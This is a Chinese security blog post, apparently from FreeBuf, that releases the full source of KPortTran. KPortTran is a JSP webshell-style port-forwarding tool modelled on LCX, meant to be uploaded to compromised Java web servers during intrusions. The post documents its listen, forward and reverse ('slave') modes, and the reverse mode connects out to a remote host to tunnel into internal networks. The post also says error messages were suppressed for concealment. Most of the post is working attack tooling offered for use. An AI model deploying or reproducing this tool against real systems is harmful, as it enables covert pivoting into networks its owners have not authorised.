JSP端口转发工具 – KPortTran

渗透过程中，由于windows和linux的差别以及运行语言环境的限制导致端口转发经常出现问题。于是自己写了个简单的JSP的端口转发脚本。仿造LCX的功能，具有正向、反向、监听三种模式。对于目前数量众多的JAVA WEB网站来说，可以比较方便的实现端口转发。

在这里发布出来，小伙伴们使用过程中，如果发现什么bug欢迎提交哈~

参数说明

/KPortTran.jsp?lip = local ip / 本地ip                    //一般为内网主机IPlp = local port / 本地端口                 //一般为内网主机端口rip = remote ip / 远程ip                 //一般为外网连接者IP，或者内网其他主机rp = remote port / 远程端口             //一般为外网连接者端口lp2 = local port2 / 本地端口2             //本地监听转发时的第二个端口m = mode / 运行模式                     //合法的值有：listen tran slave三种

运行模式

m = listen
需要参数:lp、lp2
该模式下，会在本地监听两个端口，相互转发数据
m = tran
需要参数：lip、lp、rip、rp
该模式为正向转发下，会在本地的lip上监听lp端口，当有连接建立时，再连接rip的rp端口。并将lip的lp上接收到的数据发向rip主机的rp端口。
m = slave
需要的参数： lip、lp、rip、rp
该模式为反向转发，会分别连接主机lip的lp端口 和 主机rip的rp端口。并转发两者数据，可用于内网反连。

注意事项：

某些server上使用时，可能由于编码问题会报错，请根据实际情况，更改代码首行的编码设置。
为了隐蔽，没有设置错误信息返回。如果不能执行，请检查一下参数。

测试截图与源代码：

<%@page pageEncoding="GBK"%><%@page import="java.io.*"%><%@page import="java.util.*"%><%@page import="java.nio.charset.*"%><%@page import="javax.servlet.http.HttpServletRequestWrapper"%><%@page import="java.net.*"%><%/*code by KingX*/class KPortTran {public void listen(String port1, String port2) {ServerSocket listenServerSocket = null;ServerSocket outServerSocket = null;try {listenServerSocket = new ServerSocket(Integer.parseInt(port1));outServerSocket = new ServerSocket(Integer.parseInt(port2));} catch (NumberFormatException e) {} catch (IOException e) {}Socket listenSocket = null;Socket outSocket = null;try {while (true) {listenSocket = listenServerSocket.accept();outSocket = outServerSocket.accept();new tranThread(outSocket, listenSocket).start();new tranThread(listenSocket, outSocket).start();Thread.sleep(200);}} catch (Exception e) {  }}public void slave(String targetIP, String port1, String srcIP, String port2) throws IOException {InetAddress src = InetAddress.getByName(srcIP);InetAddress dest = InetAddress.getByName(targetIP);int p1 = Integer.parseInt(port1);int p2 = Integer.parseInt(port2);new Server(src, p2, dest, p1, true);}public void tran(String srcIP, String port1, String targetIP, String port2)throws NumberFormatException, IOException {InetAddress src = InetAddress.getByName(srcIP);InetAddress dest = InetAddress.getByName(targetIP);int p1 = Integer.parseInt(port1);int p2 = Integer.parseInt(port2);new Server(src, p1, dest, p2, false);}class tranThread extends Thread {Socket in;Socket out;InputStream is;OutputStream os;public tranThread(Socket in, Socket out) throws IOException {this.is = in.getInputStream();this.os = out.getOutputStream();this.in = in;this.out = out;}private void closeSocket() {try {is.close();os.close();in.close();out.close();} catch (IOException e) {}}@Overridepublic void run() {super.run();byte[] buffer = new byte[4096];int len = -1;try {while (true) {if (in.isClosed() || out.isClosed()|| (len = is.read(buffer, 0, buffer.length)) == -1) {break;} else {os.write(buffer, 0, len);os.flush();}}} catch (IOException e) {closeSocket();} finally {closeSocket();}}}class Server extends Thread {InetAddress src;InetAddress dest;int p1, p2;boolean reverse = false;public Server(InetAddress srcIP, int srcPort, InetAddress targetIP,int targetPort, boolean flag) {this.src = srcIP;this.dest = targetIP;this.p1 = srcPort;this.p2 = targetPort;this.reverse = flag;start();}@Overridepublic void run() {super.run();if (reverse) {try {Socket s = new Socket(src, p1);Socket s2 = new Socket(dest, p2);new tranThread(s, s2).start();new tranThread(s2, s).start();while (true) {if (s2.isClosed() || s.isClosed()) {if (s2.isClosed()) {s2 = new Socket(dest, p2);}if (s.isClosed()) {s = new Socket(src, p1);}new tranThread(s, s2).start();new tranThread(s2, s).start();}Thread.sleep(1000);}} catch (IOException e) {} catch (InterruptedException e) {}} else {ServerSocket ss;try {ss = new ServerSocket(p1, 5, src);while (true) {Socket s = ss.accept();Socket s2 = new Socket(dest, p2);new tranThread(s, s2).start();new tranThread(s2, s).start();}} catch (IOException e) {e.printStackTrace();}}}}}%><%final String localIP = request.getParameter("lip");final String localPort = request.getParameter("lp");final String localPort2 = request.getParameter("lp2");final String remoteIP =request.getParameter("rip");final String remotePort =request.getParameter("rp");final String mode =request.getParameter("m");KPortTran pt = new KPortTran();if (mode.equals("tran")) {pt.tran(localIP, localPort, remoteIP , remotePort);}if (mode.equals("slave")) {pt.slave(localIP, localPort, remoteIP , remotePort);}if (mode.equals("listen")) {pt.listen(localPort, localPort2);}%>

出自：FreebuF.COM